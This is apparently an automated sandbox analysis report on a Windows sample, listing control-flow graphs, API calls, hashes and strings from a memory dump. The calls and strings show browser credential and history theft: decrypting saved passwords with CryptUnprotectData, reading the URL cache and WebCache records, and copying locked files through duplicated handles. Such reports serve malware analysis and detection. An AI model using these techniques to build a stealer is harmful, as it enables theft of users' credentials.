                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                    • String ID: chp$v10
                                                                                                    • API String ID: 1297422669-2783969131
                                                                                                    • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                    • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                    • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                    • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                    • String ID: bhv
                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2941347001-70141382
                                                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                    • String ID: visited:
                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                    • Opcode ID: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                    • Opcode Fuzzy Hash: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 115830560-3916222277
                                                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                    • String ID: |A
                                                                                                    • API String ID: 77810686-1717621600
                                                                                                    • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                    • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                    • String ID: r!A
                                                                                                    • API String ID: 2791114272-628097481
                                                                                                    • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                    • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
